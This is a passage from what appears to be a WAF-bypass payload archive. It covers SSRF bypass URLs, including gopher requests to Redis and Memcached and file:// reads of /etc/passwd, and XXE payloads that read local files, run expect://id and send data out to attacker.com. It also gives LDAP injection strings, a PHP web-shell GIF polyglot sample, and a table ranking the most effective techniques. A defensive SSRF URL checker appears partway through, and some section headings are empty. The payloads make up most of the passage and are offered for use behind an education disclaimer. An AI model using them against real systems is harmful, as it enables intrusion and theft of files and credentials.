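        ("photo.gif", "image/gif", b"GIF89a;<?php system($_GET['c']); ?>"),
        ("photo.gif", "image/gif", b"GIF89a\x01\x00\x01\x00\x80\x00\x00"),
    ]:
        print(name, "->", validate_upload(name, ctype, body))
```

The open-tag scan is defence in depth rather than the control that matters: a file that is never served from a script-executing location cannot run whatever it contains, and re-encoding accepted images through an image library discards trailing payloads that no signature scan would catch.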

6. SSRF WAF BYPASS (40+)

6.1. Localhost Bypass

```text
http://[::1]
http://[::]
```

6.2. Decimal IP Bypass

```text
http://2130706433 (127.0.0.1)
http://3232235521 (192.168.1.1)
http://167772160 (10.0.0.0)
```

6.3. Octal IP Bypass

6.4. Hexadecimal IP Bypass

6.5. Dword IP Bypass

6.6. Mixed IP Format Bypass

6.7. URL Redirect Bypass

6.8. DNS Rebinding Bypass

6.9. Alternative Schemes

```text
file:///etc/passwd
file:///c:/windows/win.ini
dict://localhost:11211/info
gopher://localhost:8080/_GET%20/index.html%20HTTP/1.1
```

6.10. Gopher Bypass (Redis/Memcached)

```text
gopher://127.0.0.1:6379/_*2%0d%0a$4%0d%0aINFO%0d%0a
gopher://127.0.0.1:11211/_stats
```

6.11. FTP Bypass

```text
ftp://127.0.0.1:21
ftp://localhost:21
```

6.12. SFTP Bypass

```text
sftp://127.0.0.1:22
sftp://localhost:22
```

6.13. AWS Metadata Bypass

6.14. GCP Metadata Bypass

6.15. Azure Metadata Bypass

6.16. Protocol Smuggling Bypass

```text
http://127.0.0.1:[email protected]
```
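
The entries in 6.1, 6.2, 6.9 to 6.12 and 6.16 defeat a destination check that compares the host as a string. The checker below is an added example written for this page from the defender's side, not code from the archive's author. It restricts the scheme to `http`/`https`, rejects any userinfo before `@`, and turns a host literal into an address before comparing it with the loopback, private, link-local, unspecified, multicast and reserved ranges; the literal parser follows `inet_aton()` semantics (decimal, `0`-prefixed octal, `0x`-prefixed hex, one to four parts with the last part filling the remaining bytes), which is the general case of which the decimal forms in 6.2 are one instance. Function names and the sample list are my own. A DNS name cannot be judged offline: the check must be repeated on every address the resolver returns, at connect time, or a name that resolves first to a public and then to an internal address walks past it.

```python
import ipaddress
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # gopher, dict, file, ftp, sftp (6.9-6.12) stay out


def parse_ipv4_literal(host: str):
    """inet_aton()-style parse: decimal, 0-prefixed octal or 0x-prefixed hex
    parts, one to four of them, the last part filling the remaining bytes.
    Returns an IPv4Address, or None when the host is not such a literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]+", p):
            values.append(int(p[2:], 16))
        elif re.fullmatch(r"0[0-7]+", p):
            values.append(int(p, 8))
        elif re.fullmatch(r"[0-9]+", p):
            values.append(int(p, 10))
        else:
            return None
    *head, last = values
    last_bits = 8 * (4 - len(head))
    if any(v > 255 for v in head) or last >= 1 << last_bits:
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << last_bits) | last)


def literal_to_ip(host: str):
    """Address for an IP literal (brackets already removed by urlsplit), else None."""
    if re.fullmatch(r"[0-9a-fA-FxX.]+", host):   # numeric IPv4 forms, any base
        return parse_ipv4_literal(host)
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None                               # a DNS name
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                       # ::ffff:127.0.0.1 -> 127.0.0.1
    return ip


def is_internal(ip) -> bool:
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_multicast or ip.is_reserved)


def check_outbound_url(url: str):
    """(allowed, reason) for a user-supplied fetch target."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} is not allowed"
    if parts.username is not None:               # 6.16: real host is after the '@'
        return False, "userinfo before '@' is not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    ip = literal_to_ip(host)
    if ip is None:
        return True, f"{host}: DNS name, resolve and re-check every address"
    if is_internal(ip):
        return False, f"{host} -> {ip} is internal"
    return True, f"{host} -> {ip}"


if __name__ == "__main__":
    # Constructed sample targets using the forms from sections 6.1, 6.2, 6.9, 6.10, 6.16.
    for url in ["http://[::1]", "http://2130706433", "http://0x7f000001",
                "http://0177.0.0.1", "http://127.1", "gopher://127.0.0.1:6379/_INFO",
                "http://127.0.0.1:80@example.com", "https://example.com/api"]:
        print(url, "->", check_outbound_url(url))
```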

7. XXE WAF BYPASS (30+)

7.1. Basic XXE

```xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
```

7.2. Parameter Entity Bypass

```xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker.com/xxe.dtd">%remote;]>
<root/>
```

7.3. UTF-16 Bypass

```xml
<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
```

7.4. UTF-32 Bypass

```xml
<?xml version="1.0" encoding="UTF-32"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
```

7.5. ISO-8859-1 Bypass

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
```

7.6. CDATA Bypass

```xml
<!DOCTYPE root [<!ENTITY % start "<![CDATA["> <!ENTITY % xxe SYSTEM "file:///etc/passwd"> <!ENTITY % end "]]>"> %start;%xxe;%end;]>
<root/>
```

7.7. Base64 Bypass

```xml
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<root>%xxe;</root>
```

7.8. PHP Wrapper Bypass

```xml
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=config.php">]>
<root>&xxe;</root>
```

7.9. Expect Bypass

```xml
<!DOCTYPE root [<!ENTITY xxe SYSTEM "expect://id">]>
<root>&xxe;</root>
```

7.10. Out-of-Band (OOB) Bypass

```xml
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/oob">%xxe;]>
<root/>
```

7.11. XML Schema Bypass

```xml
<!DOCTYPE root [
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/schema.dtd">
%dtd;
]>
<root/>
```

8. LDAP INJECTION WAF BYPASS (20+)

8.1. Basic Bypass

```ldap
*)(uid=*
*)(|(uid=*
*)(|(cn=*
*)(|(sn=*
*)(|(mail=*
*)(|(ou=*
*)(|(dc=*
```

8.2. AND/OR Bypass

```ldap
*)(&(uid=*)
*)(|(uid=*)
*)(!(!(uid=*))
*)(&(cn=*)(uid=*))
*)(|(cn=*)(uid=*))
```

8.3. Null Bypass

```ldap
%00*)(uid=*
%00*)(|(uid=*
%00*)(&(uid=*
```

8.4. Comment Bypass

```ldap
*)(uid=*)#
*)(|(uid=*)#
*)(&(uid=*)#
*)(!(!(uid=*)))#
```

8.5. Space Bypass

```ldap
*)(uid=*)
*)(|(uid=*))
*)(&(uid=*))
*)(!(uid=*))
```

🎯 SUMMARY TABLE

| Category | Payload Count | Most Effective Technique |
|---|---|---|
| SQLi | 150+ | Double URL Encoding + Comment |
| XSS | 100+ | HTML Entity + Event Handler |
| Command Injection | 80+ | IFS Variable + New Line |
| LFI/RFI | 70+ | Double URL Encoding + Wrapper |
| File Upload | 60+ | Magic Bytes + Double Extension |
| SSRF | 40+ | Decimal IP + Redirect |
| XXE | 30+ | Parameter Entity + UTF-16 |
| LDAP | 20+ | Basic Bypass + Comment |

📢 CLOSING WORDS

All of the payloads in this archive are intended for education and security testing. Do not use them on systems without authorization. Every WAF is different; a single payload will not always work. You have to experiment to find out which technique works.

@Tc4dy | github.com/tc4dy
 